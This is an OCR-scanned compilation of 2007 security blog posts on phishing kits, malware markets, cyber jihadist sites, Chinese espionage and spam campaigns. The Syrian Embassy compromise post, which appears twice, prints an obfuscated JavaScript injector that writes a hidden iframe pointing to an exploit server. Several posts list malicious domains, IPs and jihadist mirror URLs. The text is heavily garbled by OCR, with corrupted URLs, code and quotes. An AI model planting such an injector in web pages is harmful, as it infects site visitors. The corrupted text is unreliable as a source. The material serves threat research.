9. http://ddanchev.blo as pot.com/2007/08/nuclear-malware- 
kit.html 


10. http://ddanchev.blo as pot.com/2007/09/ a oo a le-hackin g- 
for-mpacks-zunkers-and.html 
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DIY Phishing Kit Goes 2.0 (2007-09-20 12:57) 

With the release of the second version of the [ 1 ]DIY phishing 
kit that I covered in a previous post, next to commentary on 
[2]another one and a [3]DIY pharming tool, the timeframe for 
creating a phishing page just got shorter than it 

used to be before. Moreover, the phishing ecosystem is 
getting closer to fully achieving its malicious economies of 


































scale, ones where the number of phishing campaigns in the 
wild outpaces the possibilities for timely shutting them 

down. Even worse, phishers do not seem to be interested in 
re-inventing the wheel, and having to create a new 

phishing page for any site or service, instead, such phishing 
pages are now a commodity, and with the ecosystem 

itself clearly cooperating with malware authors, you end up 
in a situation where a malware infected host is not just 

hosting malware for the next victim to get infected, running 
multiple DNS servers, sending out spam and phishing 

emails, but also, hosting the phishing pages themselves. 

Amateur phishers do not put efforts into ensuring the quality 
and the lifetime of their phishing campaigns, and you 
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can clearly recognize such amateur campaign by visiting the 
phishing URL you've just received to figure out it's al¬ 
ready down. The more sophisticated phishers, however, are 
not just efficiency-obsessed, but also, take advantage 

of typosquatting and basic segmentation approaches, for 
instance, acquiring a Russian email database to use as the 

foundation for a WebMoney phishing campaign, and a U.S 
one for a PayPal one. Moreover, sophisticated phish¬ 
ers also put more efforts and invest more time into 
personalizing the emails and in rare cases, the phishing 


pages 


themsleves, that's of course in between localizing the 
campaign by having it translated into the local language of 
the country for which the emails database belongs to, thus 
improving the chances of the campaign. This is yet another 

disturbing trend worth commenting on - malware is maturing 
into a services centered economy, and so is the case 

with spamming and phishing, a logical development with the 
commodization of what used to very exclusive tools. 
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What are the major improvements in the new version? In the 
first one, the phisher had to manually paste the source 

code of the real page, have the kit automatically redirect the 
data to a third party URL, and also manually fix the image 
locations to ensure that they will load properly. In the second 
version, there're POST and GET commands available 

so that the source code gets acquired automatically, and an 
internal Image Grabber so that the exact URLs of all the 

images within the login page can get easily integrated within 
the phishing page about to get generated. Getting back to 
differentiating the amateur from sophisticated phishers, the 
second have more resources at their disposal and better 

confidence in their hosting provider so that compared to 
loading the images from the original site, they're hosting 

them locally. This kit will inevitably continue to evolve, wish 
it was proportionally with the end user's understanding of 


how to protect against "push" phishing attacks though 
Related posts: 

[4] The Phishing Ecosystem 

[5] Confirm Your Gullibility 

[6] The Economics of Phishing 
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[7] Pharming Attacks Through DNS Cache Poisoning 

[8] Average Online Time for Phishing Sites 

[9] Clustering Phishing Attacks 

[10] Phishing Domains Hosting Multiple Phishing Sites 

[11] 209 Host Locked 

[12] PayPal and Ebay Phishing Domains 

[13] Spammers and Phishers Breaking CAPTCHAs 

[14] The Brandjacking Index 

[15] Take this Malicious Site Down - Processing Order.. 

[16] Taking Down Phishing Sites - A Business Model? 

1. http://ddanchev.blo as pot.com/2007/08/di v- phishin a 
kits.html 

2. http://ddanchev.blo as pot.com/2007/08/di v- phishin a 
kits.html 










3. http://ddanchev.blo as pot.com/2007/08/di v- pharmin a- 
tools.html 

4. http://ddanchev.blo as pot.com/2007/Q2/phishin a- 
ecosvstem.html 

5. http://ddanchev.blo as pot.com/2007/07/confirm-vour- 
a ullibilitv.html 

6. http://ddanchev.blo as pot.com/2007/08/economics-of- 
phishin a .html 

7. http://ddanchev.blo as pot.com/2007/Q8/pharmin a -attacks- 
throu a h-dns-cache.html 

8. http://ddanchev.blo as pot.com/2007/Q7/avera a e-online- 
time-for-phishin a -sites.html 

9. http://ddanchev.blo as pot.com/20Q7/01/clusterin a- 
phishin a -attacks.html 

10. http://ddanchev.blo as pot.com/20Q6/12/phishin a- 
domains-hostin a -multiple.html 

11. http://ddanchev.blo as pot.com/2007/09/2Q9-host- 
locked.html 


12. http://ddanchev.blo as pot.com/2007/Q9/ pav pal-and-eba v- 
phishin a -domains.html 

13. http://ddanchev.blo as pot.com/2007/Q9/spammers-and- 
phishers-breakin a -captchas.html 

14. http://ddanchev.blo as pot.com/2007/Q5/brand i ackin a- 
index.html 


15. http://ddanchev.blo as pot.com/2007/Q3/take-this- 
malicious-site-down.html 






























































16. http://ddanchev.blo as pot.com/2007/Q4/takin a -down- 
ohishin a -sites-business.html 
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The Truth Serum - Have a Drink! (2007-09-21 15:50) 

Which security vendor would you rather choose if you were 
to ignore your current [l]Return on Security Investment 

model? The one telling you 11 everything's under control" , 
that 11 malicious attackers are loosing creativity and cannot 
bypass our security solutions", or the one who's attitude is 11 
our solutions fully demonstrate marginal thinking in respect 
to fighting cyber threats, namely, they mitigate certain risks 
and limit the probability for a security incident, but do not 
and cannot provide 100 % security"? 

Basic human psychology and purchasing habits would stick 
to the first one, the one pretending to offer 100 % 

security - something even a condom cannot offer yet 
everyone's thankfully using them. Even worse, which is 
falling 

victim into the myopia that the market leader, or the 
company with the highest brand equity is actually the one 

worth doing business with. As it appears, McAfee CEO 
David DeWalt had a drink from the truth serum before 

InformationWeek's 500 Conference in order to comment that 
" We're in inning two of a nine-inning game here" in respect 
to how [2]cyber threats often outpace security measures. 
Moreover, an year ago I commented on a Gartner 







analyst's statement that [3]security is all about percentage 
of budget allocation, and therefore the more you spend 

the more secure you get, among the most common myopias 
nowadays. Now, Gartner vice-president John Pescatore 

is [4]wisely insisting that companies spend less on IT 
security, and given how when Gartner sneezes the 
whole 

industry gets cold, it's a step in the right direction - 
debunking common security myopias. 

In a world dominated by [5]perimeter defense solutions, 
being a visionary realist is an objective luxury. 



1. http://ddanchev.blo as pot.com/2006/Q5/valuin a -securit v- 
and-prioritizin a- vour.html 


2. http://www.itnews.com.au/News/61497 .c vberthreats- 
outpace-securitv-measures-savs-mcafee-ceo.as px 

3. http://ddanchev.blo as pot.com/2006/Q7/bud a et-allocation- 
mvo pia-and.html 

4. 

http://www.computerweeklv.com/Articles/2007/09/19/22685 
7/s pend-less-on-it-securitv-sa vs-a artner.htm 

5. http://ddanchev.blo as pot.com/2007/01/still-livin a -in- 
perimeter-defense-world.html 
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The Dark Web and Cyber Jihad (2007-09-24 13:56) 

It's interesting to monitor the use and abuse of the buzz word 
M [l]Dark Web". This press release for instance, tries to imply 
































that the [2]crawlers are actually crawling the Dark Web and 
analyzing cyber jihadist activities, a bit of an 

awkward statement given what [3]the Dark Web is at the 
bottom line - a web that is closed for web crawlers either 

thought standard measures, or authentication : 

11 This is where the Dark Web project comes in. Using 
advanced techniques such as Web spidering, link analy¬ 
sis, content analysis, authorship analysis, sentiment analysis 
and multimedia analysis, Chen and his team can find, 
catalogue and analyze extremist activities online. According 
to Chen, scenarios involving vast amounts of information and 
data points are ideal challenges for computational scientists, 
who use the power of advanced computers and 

applications to find patterns and connections where humans 
can not. One of the tools developed by Dark Web 

is a technique called Writeprint, which automatically extracts 
thousands of multilingual, structural, and semantic features 
to determine who is creating 'anonymous' content online. 
Writeprint can look at a posting on an online 

bulletin board, for example, and compare it with writings 
found elsewhere on the Internet. By analyzing these certain 
features, it can determine with more than 95 percent 
accuracy if the author has produced other content in the 
past. 

The system can then alert analysts when the same author 
produces new content, as well as where on the Internet the 
content is being copied, linked to or discussed. " 



I've [4]blogged about this Al project over an year ago, and 
have been following it ever since while experiment¬ 
ing with [5]Iink and multimedia analysis of cyber jihadist 
communities before [6]they were shut down. And while the 

innovations they've introduced for this period are impressive 
in terms of drawing social networking maps, the Dark 

Web's very principle, namely that it's authentication only 
Web, meaning it's closed for spiders, even human based 

researchers thought basic invite only or password 
authentication methods will prompt researchers to adapt in 
the 

long-term. Many of the cyber jihadist forums I didn't include 
in my last external links extraction were great examples of 
the dark cyber jihadist web, knowing where you crawl 
doesn't mean there'll be anything publicly available to 

crawl, and the trend is just starting to emerge. Such VIP clubs 
represent closed communities where more efforts 

should be put in taking a peek, thus it's ruining previous 
efficiency centered approaches of analyzing cyber jihadist 

communities. The alternatives remain rather contradictive 
but fully realistic - [7]infecting terrorist suspects with 

malware, [8]embedding malware within cyber jihadist 
communities, or unethically pen-testing the cyber jihadist 

communities to have the Al analyze the data obtained from 
the closed community, thus the Dark Web, at a later stage. 
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Meanwhile, after having the [9]Global Islamic Media Front's 
online presence limited to the minimum, GIMF is making it in 
the mainstream media : 

11 On sites easily traceable via search engines, the German- 
language arm of the "Global Islamic Media Front" 

(GIMF) appeals for volunteer translators, inviting them to 
reply to a Hotmail address, and posts links to dozens of at 
Qaeda videos. "After some brothers and sisters were 
arrested (may Allah free them) and the Forum and blog of 
the GIMF were removed, we say this: the GIMF still exists and 
will continue its work," a statement from the front says. 

"To the Kuffar (infidels) who try to fight us, we say: you can 
do what you like, make as many arrests as you I ike... you will 
not reach your goal. We will always keep going until we 
achieve victory or martyrdom. "The re-emergence of the 
GIMF in German highlights the difficulty for authorities of 
shutting down radical Islamist Web sites, which often simply 
spring up at new addresses. " 

Easily traceable mainly because they're not behind the Dark 
Web, at least not for now. Currently active GIMF 

URLs : 

gimf.12gbfree.com 

gimf.22web.net 

gimf.cjb.net 

gimfupload.biogspot.com with two redirectors 
gimfupload.notlong.com ; gimfupload.2ya.com 

Despite that there're still literally hundreds of cyber jihadist 
forums and sites, quantity is not always equal to 



quality, namely, only a few of these will achieve success and 
mature into potentially dangerous communities. In the 

long term, however, once the "tip of the iceberg" 
communities dissapear, efficiency from the cyber jihadists 
will get sacrificed for improved OPSEC, namely they'll start 
operating behind the true Dark Web, making them more 
difficult 

and time-consuming to assess, track down, and shut down. 
UPDATE: [10]lnshallahshaheed (GIMF) has a new home. 

1. http://en.wikipedia.or g /wiki/Dark_internet 

2. http://www.nsf. a ov/news/news summ. isp? 
cntn id = 11004Q&or g = NSF 

3. http://blo o s.zdnet.com/BTL/?p=6253 

4. http://ddanchev.blo gs pot.com/2QQ6/Q5/techno- 
imperialism-and-effect-of.html 

5. http://ddanchev.blo gs pot.com/20Q7/Q8/analvses-of-cvber- 
j ihadist-forums-and.html 

6. http://ddanchev.blo gs pot.com/2QQ7/Q9/two-cvber- i ihadist- 
blo a s-now-offline.html 

7. http://ddanchev.blo gs pot.com/20Q7/Q9/infectin g -terrorist- 
suspects-with.html 

8. http://ddanchev.blo Qs pot.com/2007/09/ po pular-web- 
malware-exploitation.html 

9. 

http://www.reuters.com/article/worldNews/idUSL2179642220 

Q7Q921?feedT v pe=PSS&feedName=worldNews&sp=true 








































10 . 

http://blackf1a a .word Dress.com/2007/09/26/inshallahshahee 
d-a imf-has-a-new-home/ 
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Localizing Open Source Malware (2007-09-26 09:21) 

Can you find the differences in this piece of malware 
compared to [l]the previous open source one I covered 
recently? 

Besides its localization to Chinese there aren't any, and this 
development clearly demonstrates the dynamics of the 

























































































malware scene. A common Web 2.0 mentality is that the 
more people use the service, the better it gets, a mode of 

thinking we could see applied in the case of open source 
malware, and [2]malware as a web service. Once the source 

code becomes publicly obtainable, it's not just new features 
and modules that get introduced, but also, the malware 

starts using the Web as a platform. In fact, some of the most 
popular open source malware codes are successfully 

building communities around their open source nature, thus, 
attracting "malicious innovation" on behalf of third-party 
coders. Should we therefore make a distinction between a 
malware author, and a [3]malware module coder? 

1. http://ddanchev.blo as pot.com/20Q7/Q9/custom-ddos- 
ca pabilities-within-malware.html 

2. http://ddanchev.blo as pot.com/2QQ7/Q8/malware-as-web- 
service.html 

3. http://ddanchev.blo as pot.com/2007/Q8/distributed-wifi- 
scannin a -throu a h.html 
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China's Cyber Espionage Ambitions (2007-09-26 
09:42) 

Must have been slow news week, so slow that all of a sudden 
[l]Germany, the [2]U.K, [3]France, [4]New Zealand, 

and the [5]U.S got hacked by China's cyber spies. "Poor 
China" not just denied, but also [6]admitted of getting 
hacked by supposedly one of the countries that started the 
alligations. Pretty much all the news articles basically 
enjoying 

the media-echo effect exclude the reality as an issue, namely 
that each of the country that's blaming China for cyber 

espionage, has been [7]developing its own offensive cyber 
warfare capabilities for years. Some of the good examples 

to illustrate the diverse topic are for instance, [8]North 
Korea's Cyber Warfare Unit 121 that was originally started in 
order for North Korea to balance its lack of conventional 
weaponry capabilities by improving its asymmetric warfare 

ones, passive cyber espionage in the form of [9]gathering 
OSINTThrough Botnets, releasing [10]DIY attack tools in 

times of hacktivism tensions, or the [11 ]healthy paranoia 
posed by the fear of now Chinese owned Lenovo could be 

[12]implementing hardware backdoors in between China's 
recent [13]interest in buying Seagate Technology fueling 

the tensions even further. 

In a nation2nation cyber warfare scenario, the country that's 
[ 14]relying on and empowering its citizens with 



cyber warfare or CYBERINT capabilities, will win over the 
country that's dedicating special units for both defensive 

and offensive activities, something China's that's been 
copying attitude from the U.S military thinkers, is already 

envisioning : 

11 It also put forward the concept of a "people's information 
war" for the first time, describing this as a form of national 
non-symmetric warfare, with the people at the core, 
computers as the weapons, knowledge as the am-munition 
and the enemy's information network as the battlefield. 
These experts believe that ordinary people can 

be mobilized to provide global information support, spread 
global propaganda and conduct global psychological 

warfare. Such attacks could be launched from anywhere in 
the world at the enemy's military, political and economic 
information systems. If necessary, the experts suggested, 
computers currently under the control of Chinese enterprises 
could be dispersed among the people and connected to 
volunteer Web portals around the world, which would 
become 

a combined strategic cyber attack force. The article 
concluded by emphasizing that training "hacker warriors" 
should be a priority within the Chinese military. 11 

[15]AII warfare is indeed based on deception. Go thought a 
related post on the [16]The Biggest Military Hacks of 

All Time as well, and if objectivity is important to you, ask 
yourself the following, or question the lack of its answer 
within an article stating a country did something : 



Was it the NSANet, the [ 17]Joint Worldwide Intelligence 
Communications System [JWICS], the [18]Secret Inter¬ 
net Protocol Router Network (SIPRNET), or the 

[19] Unclassified but Sensitive Internet Protocol Router 
Network 

(NIPRNet) actually breached? 

[20] Cover courtesy of [21]Der Spiegel. 
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A New Issue of (IN)Secure Magazine "in the Wild" 
(2007-09-26 11:00) 

[l](IN)Secure Magazine's Issue 13 was released yesterday, 
and as always is definitely worth printing out. What is 

(IN)Secure Magazine? (IN)Secure Magazine is the type of "too 
good to be for free" kind of publication, covering the 
information security industry, the newly emerging 
technologies and threats, as well as the people who put it all 

together. 

It's also great to note that my blog has been featured in their 
new section at page 62, an indication for an up¬ 
coming flood of an even more quality audience, and a 
personal incentive to contribute to a future issue of the 













magazine with a qualitative research on zero day 
vulnerability markets I've been working on fora while. 

1. http://www.net-securitv.or g /dl/insecure/INSECURE-Ma a- 
13.pdf 
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Syrian Embassy in London Serving Malware (2007-09- 
27 19:25) 

After Bank of India was serving malware in August, next to 
the U.S Consulate in St.Petersburg two days later in 

September, now the Syrian Embassy in London is the latest 
victim of a popular malware embedding attack which 

took place between the 21st and 24th of September. 







As obfuscating the IFRAMEs in order to make it harder for a 
security researcher to conduct CYBERINT is about 

to become a commodity with the feature implemented within 
the now commoditized malware kits, it's interesting 

to note that in this particular attack the attackers took 
advantage of different javascript obfuscations, and that once 
control of the domain was obtained, scam pages were 
uploaded on the 

embassy's server. The embassy had recently removed the 
malicious IFRAMEs, but the third one remains ac¬ 
tive acting as a counter for the malicious campaign. 

Which domains act as infection vectors? 

sicil.info/forum/index.php and sicil.info/g/index.php 

(203.121.79.71) using patched vulnerabilities exploited in 
the usual MPack style : 

function setslice _exploit 

function vml _exploit 

function firefox _exploit 

function firefoxl _exploit 

function wmplayer _exploit 

function qtime _exploit 

function yahoo _e 
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<SCRIPT LfiNGUftGE="JauaScript"> 

<»-- 

function Decode(){uar temp="" I i,c=0,out="";uar 

Str="60?105?102?114?97?109?101?32?119?105?100?116?104?61?49?32?104?101?105?103?104?116?61?49?32?9 
8?111 ?114?100?101 ?114?61 ?48?32?102?114?97?109?101 ?98?111 ?114?100M01 ?114?61 ?48?32?115?114?99?61 ?3 
9?104?116?116?112?58?47?47?48?107?105?46?114?117?47?102?111?114?117?109?47?105?110?100?101?120?46 
?112?104?112?39?62?60?47?105?102?114?97?109?101?62?”;l=str.length;while(c<=str.length-1){while(st 
r .charAt(c)?=‘? 1 )temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}documen 
t.write(out) ;> 

//--> 

</SCRIPTXSCRIPT LfiNGUftGE="JauaScript"> 

<? — 

Decode(); 

//--> 

</SCRIPT>| 

function winzip _exploit 
function flash _exploit 
function w2k _ex 

Oki.ru/forum/index.php (80.91.191.224) where a 
WebAttacker launches several other exploits, 

and 

xl2345.org/img/counter. php?out=1189360677 

(66.36.243.97) 

What are the malware authors trying to infect the 
visitors with? 

A Banker Trojan with a low detection rate : 

BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack 
Ikarus 2007.09.28 Trojan.Delf.NEB 
Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen 
Symantec 2007.09.28 Infostealer.Banker.C 


98shd3.exe 



File size: 65024 bytes 

MD5: ef98a662c72e3227d5c4bb3465133040 

SHA1: e5b9b216d77de977848f8791850c726b45fcl8c2 

Think malware authors were virtually satisfied to only have 
the visitors infected with the malware? Not at all. 

This is perhaps the first but definitely not the last time I see 
an embassy hosting pharmaceutical scam pages and ring 
tone ones. List of historically hosted scam pages : 

syrianembassy.co.uk/news/lv/levitra-vs-vi agra.htm 

syrianembassy.co.uk/news/lv/buy-levitra.htm 

syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm 

syrianembassy.co.uk/news/xa/cheap-d iscount.htm- 
group.com-herbal-xanax-xnx.htm 

syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm 

syrianembassy.co.uk/news/xa/buy-site-xanax.htm 

syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm 

UPDATE: 

The folks at ScanSafe contacted me to point out that they've 
discovered the malware at the Syrian embassy on the 

12th of August providing us with more insights on how long 
the attackers had access to the embassy's site. 
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In ScanSafe's example, different malicious URLs 
(miron555.org/s/index.php) were rotated compared to the 
ones used during 21/24 of September. And given the 
embassy's site states it was last updated in 2005, cleaning it 
up 

and ensuring the attackers no longer have access to it may 
take a while. 
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Syrian Embassy in London Serving Malware (2007-09- 
28 20:33) 

After [l]Bank of India was serving malware in August, next to 
the [2]U.S Consulate in St.Petersburg two days later 

in September, now the [3]Syrian Embassy in London is the 
latest victim of [4]a popular malware embedding attack 




which took place between the 21st and 24th of September. 

As obfuscating the IFRAMEs in order to make it harder 

for a security researcher to conduct CYBERINT is about to 
become a commodity with the feature implemented 

within the now [5]commoditized malware kits, it's interesting 
to note that in this particular attack the attackers took 
advantage of different javascript obfuscations, and that once 
control of the domain was obtained, scam pages were 

uploaded on the embassy's server. The embassy had recently 
removed the malicious IFRAMEs, but the third one 

remains active acting as a counter for the malicious 
campaign. 

Which domains act as infection vectors? 

sicil.info/forum/index.php and sicil.info/g/index.php 

(203.121.79.71) using patched vulnerabilities exploited in 
the usual MPack style : 

function setslice _exploit 

function vml _exploit 

function firefox _exploit 

function firefoxl _exploit 

function wmplayer _exploit 

function qtime _exploit 

function yahoo _e 

function winzip _exploit 



function flash _exploit 
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<SCRIPT LfiNGUflGE="JauaScript"> 

<!— 

function Decode(){uar temp="",i,c=0,out="";uar 

Str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!9 
8!111!114!100!101!114!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114!99!61!3 
9!104*116!116!112!58!47!47!48*107!105*46!114!117!47!102!111!114!117!109!47!105!110!100!101!120!46 
!112!104!112!39!62!60!47!105!102!114!97!109!101!62!”;l=str.length;while(c<=str.length-1){while(st 
r .charAt(c)!='!*)temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);terap="";}documen 
t.write(out) ;> 

//--> 

</SCRIPTXSCRIPT LfiNGUftGE="JauaScript"> 

<! — 

Decode(); 

//—> 

</SCRIPT>| 

function w2k _ex 

Oki.ru/forum/index.php (80.91.191.224) where a 
WebAttacker launches several other exploits, 

and 

xl2345.org/img/counter. php?out=1189360677 

(66.36.243.97) 

What are the malware authors trying to infect the 
visitors with? 

A Banker Trojan with a low detection rate : 

BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack 
Ikarus 2007.09.28 Trojan.Delf.NEB 
Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen 
Symantec 2007.09.28 Infostealer.Banker.C 


98shd3.exe 



File size: 65024 bytes 

MD5: ef98a662c72e3227d5c4bb3465133040 

SHA1: e5b9b216d77de977848f8791850c726b45fcl8c2 

Think malware authors were virtually satisfied to only have 
the visitors infected with the malware? Not at all. This is 
perhaps the first but definitely not the last time I see an 
embassy hosting pharmaceutical scam pages and ring tone 

ones. List of historically hosted scam pages : 

syrianembassy.co.uk/news/lv/levitra-vs-vi agra.htm 

syrianembassy.co.uk/news/lv/buy-levitra.htm 

syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm 

syrianembassy.co.uk/news/xa/cheap-d iscount.htm- 
group.com-herbal-xanax-xnx.htm 

syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm 

syrianembassy.co.uk/news/xa/buy-site-xanax.htm 

syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm 

UPDATE: 

The folks at ScanSafe contacted me to point out that 
[6]they've discovered the malware at the Syrian embassy on 

the 12th of August providing us with more insights on how 
long the attackers had access to the embassy's site. In 

ScanSafe's example, different malicious URLs 
(miron555.org/s/index.php) were rotated compared to the 



ones used 


during 21/24 of September. And given the embassy's site 
states it was last updated in 2005, cleaning it up and 
ensuring the attackers no longer have access to it may take a 
while. 
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1. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

2. http://ddanchev.blo as pot.com/2007/Q9/us-consulate-st- 
petersbur a -servin g .html 

3. http://www.websense.com/securitvlabs/alerts/alert. php? 
A!ertlD=8Q6 

4. http://ddanchev.blo as pot.com/2007/07/malware- 
embedded-sites-increasin a .html 

5. http://ddanchev.blo as pot.com/2007/Q9/ po pular-web- 
malware-exploitafion.html 

6 . 

http://www.scansafe.com/threat_center/threat_alerts/malware 

detected on website of the svrian embassv in th 

e uk 
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A New DDoS Malware Kit in the Wild (2007-09-29 
16:44) 

On the majority of occasions, malware authors either put 
efforts into implementing a set of standard features within 

a malware enabling them to send out spam, use the already 
infected hosts as future infection and propagation 

vectors, or entirely outsource the features by [ljreleasing the 
malware as open source one. On the other hand, 

certain malware authors seem to avoid diversification and 
tend to stick to core competencies only, in this case a 

DDoS ready infected host as its only function, thereby 
decreasing the file size of the malware and sort of improving 



its stealthiness by putting the infected host in a passive "on 
demand" state compared to a situation where the host is 
already sending out spam and phishing emails could be 
much more easily identified as an infected one and its DDoS 

capability could turn irrelevant due the malware's multi 
tasking activities. 

This specific DDoS malware kit currently offered for sale 
includes the standard firewall bypassing and rootkit 

capabilities, in between offering the possibility for zero day 
malware on demand once previous instances of the bot 

in question achieve a high detection rate. Moreover, in 
between providing [2]custom DDoS capabilities like the ones 

I discussed in a previous post, it's yet another indication of 
the ongoing Web-ization of [3]botnet communications 

which I think is about to replace the default use of the [4]IRC 
command and control in the long term. 

1. http://ddanchev.blo as pot.com/2007/09/localizin a-o pen- 
source-malware.html 

2. http://ddanchev.blo as pot.com/2007/09/custom-ddos- 
ca pabilities-within-malware.html 

3. http://ddanchev.blo as pot.com/2007/Q3/botnet- 
communication-platforms.html 

4. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 
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DIY Chinese Passwords Stealer (2007-09-29 19:14) 

This DIY passwords stealer courtesy of a Chinese hacking 
group is pitched as Vista Compatible, with a server size in 

less than 20kb, process injection, form grabbing and 
password stealing capabilities for anything keyloggable, anti 

virus software killing capabilities, and uploading of the 
results to a central location, in this particular case an 
example is given for notification via Tencent, China's main IM 
network. [l]More info : 
















" Backdoor. Hupigon.GEN has rootkit functionality. It injects 
itself into Internet Explorer causing IE to hide itself. 

It also logs keystrokes and sends this information to remote 
servers. " 

Detection rate of the builder: Result: 15/32 (46.88 %) 

File size: 267213 bytes 

MD5: a4b9c9f42629865c542ac7b823982843 

SHA1: 78f855843d312ab76elf8f0b912bd475781a8864 

[2]Here are several more [3]recent releases by [4]Chinese 
hacking groups, as well as a comment on [5]the big 

picture. 

1 . 

http://www.pctools.com/mrc/infections/id/Backdoor.Hu piaon. 

GEN/ 

2. http://ddanchev.blo as pot.com/2007/Q9/custom-ddos- 
ca pab il lities-within-malware.html 

3. http://ddanchev.blo as pot.com/2007/Q9/chinese-malware- 
downloader-in-wild.html 

4. http://ddanchev.blo as pot.com/2007/Q9/localizin a-o pen- 
source-malware.html 
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5. http://ddanchev.blo as pot.com/2007/Q9/chinas-cvber- 
es piona a e-ambifions.html 
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Zero Day Vulnerabilities Market Model Gone Wrong 
(2007-09-30 12:20) 

It's one thing to allow legitimate buyers, presumably the 
affected vendors themselves to [ 1 ]bid for a zero day vul¬ 
nerability discovered within their products in order to provide 
financial incentive for the researcher that discovered the 
flaw, another to [2]superficially increase the monetary value 
of a zero day vulnerability taking advantage of its 

vendor-added exclusiveness, but entirely another to position 
responsible disclosure as an exclusive courteousness. 

Here's [3]a sample letter informing the company within 
whose products a vulnerability has been found, and yes, the 

ultimatum for not releasing it: 

" We've discovered an attack against the Linked In toolbar, if 
you are interested in the bug, we would like to give first right 
of refusal to purchase it. We'd also like to perform a more 
complete security audit of your products. 

We can help make the Linkedln products more secure," 
DeMott stated in e-mail sent to Linkedln on July 10, as 
viewed by CNET News.com. The e-mail continues: If you 
wouldn't like to buy it then we are happy to resell or release 
as a full disclosure to help prevent security issues arising on 
end users servers. We strongly believe in keeping users safe. 

We are unique in that we give vendors a first chance at the 
bugs we discover rather than selling to a third-party or 
releasing publicly. Please find the VDA Labs Value add 
document attached. If you'd like to buy the bug we will 
provide working attack code, so that you can verify the bug, 


before you send the check." VDA set a deadline of July 17 
and requested a payment of $5,000. " 

I first mentioned the possibility of having a security 
researcher [4]blackmail an affected party a long time ago, 

however, I never thought it would be a company with serious 
knowledge in the field that's setting ultimatums, 

doubling the requested amount for the vulnerabilities if the 
vendor delays the response and threatening to release 

a PoC in a full disclosure style. [5]Getting paid for getting 
hacked in reverse order - getting hacked for not paying. 

However, the ugly reality goes that what's a zero day for the 
mainstream media today is last month's zero day 

for the underground that's been improving the chances of 
success of their targeted attacks against a specific com¬ 
pany or an individual. That's of course in the rare cases when 
malware authors no longer [6]keep it simple, the stupids. 

Here's [7]another article on this story. Image courtesy of 
[8]eEye's Zero Day Tracker. 

1. http://ddanchev.blo as oot.com/2QQ7/Q7/zero-da v- 
vulnerabilities-auction.html 

2. http://ddanchev.blo as pot.com/20Q7/Ql/zero-da v- 
vulnerabilities-cash-bubble.html 


3. http://news.zdnet.com/210Q-1009 22-6200489.html 


4. http://ddanchev.blo as pot.com/2006/Q3/wheres-mv-0da v- 
please.html 













5. http://ddanchev.blo as pot.com/2006/03/ a ettin a- oaid-for- 
a ettin a -hacked 17.html 


6. http://ddanchev.blo as pot.eom/2007/09/ po pular-web- 
malware-exploitation.html 

7. http://www.there a ister.co.uk/2007/07/31/fees_for_exploits/ 
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8. http://research.eeve.com/html/alerts/zerodav/index.html 
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Don't Play Poker on an Infected Table (2007-09-30 
18:58) 

The scammy [l]Euro VIP Casino is making another round this 
afternoon and trying to entice the spammed European 

users into downloading its software by promising $400 as a 
welcome bonus. Needless to say you ought to ignore it. 

Here's a [2 ]fu 11 list of the [3]typosquatted domains serving 
the scams. 

Detection rate : Result: 11/32 (34.38 %) 

File size: 461341 bytes 

MD5: e68763cl6f31de340681b2c7c7eb6b0e 

SHA1: 6174960cf5a6c503b97c9160f5e6a5babfef96e9 

[4]Online gambling is a buzz Internet activity allowing 
malicious parties to enjoy the "pull effect" by end users who 
themselves look for and download such applications. In this 



















spamming campaign, however, we have a combination of a 
"push" approach, segmentation targeting European users, 
social engineering in the form of a promotion, and 
typosquatting. The first campaign (SetupCasino.exe) is 
currently hosted in China (116.199.136.29) on a host 
managing a second online gambling scam campaign 
impersonating [5]Golden Gate Casino (SmartDownload.exe) 

under the following domains topgamecasino.net; 
superroyalcasino.com; nlymycasino.cn; 
lookforcasino.cn 1. 

http://www. i amesmiller.com/mtmblo a /2006/12/euro-vi p- 

casino.html 

2. http://www.mooload.com/new/file. oho? 

fi I e=fi leO 1/300907/1191171072/euro-vi p-casi no. txt&s=t 

3. 

htt o://195.210.38.41:2082/file01/300907/l 191171072/euro- 

vi p-casino.txt 

4. http://www.ft.com/indepth/online a amblin a 

5. http://www. a olden a atecasino.net/ 
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Love is a Psychedelic Too (2007-10-01 12:49) 

Compared to a previous example of an [l]over-performing 
image spammer whose efforts to bypass spam filters make 

















it virtually impossible for someone to fall victim into the 
[2]pharmaceutical scam, in this example of image spam we 

have something very interesting, namely a dynamic 
subdomain generating spamming host running a proxy 
server 

every time the central campaign URL gets refreshed via an 
obfuscated javascript, meds247.org (216.55.70.170) is the 
public face of abetterlevel.org (221.130.192.17), and here 
are examples of the M one-time-scams-in-everything M 

style subdomains : 

cpv9c5pt.abetterlevel.org:8080/cg/viagra.php 

ccj70tjcm.abetterlevel.org:8088/cg/viagra.php 

fdbtpju.abetterlevel.org:8080/cg/viagra.php 

b80cpno.abetterlevel.org:8088/cg/viagra.php 

ffh3rj8zn.abetterlevel.org:8088/cg/viagra.php 
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Once accessed, a few minutes later the subdomains either 
stop responding, or start listening on the second port. 

Moreover, all the subdomains generated at 

abetterlevel.org resolve to radius.tercernivel.com 

(200.57.39.20) an indication of an ecosystem operating on 
three different networks. 


1. http://ddanchev.blo as pot.com/2006/06/over-performin a- 
s pammer.html 






2 . 

htto://www. uow.edu .au/arts/sts/bmartin/dissent/documents/h 

ealth/pharmfraud.html 
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The Dynamics of the Malware Industry - Proprietary 
Malware Tools (2007-10-02 12:06) 

The Underground Economy's Supply of Goods and 
Services 

The demand for private [l]malware tools such as crypters, 
loaders and droppers is in tact with the supply of such 

tools, a market model whose higher profit margins satisfy 
both the coder of the tool as the seller and the buyer 

who's willing to pay a higher price for an undetected 
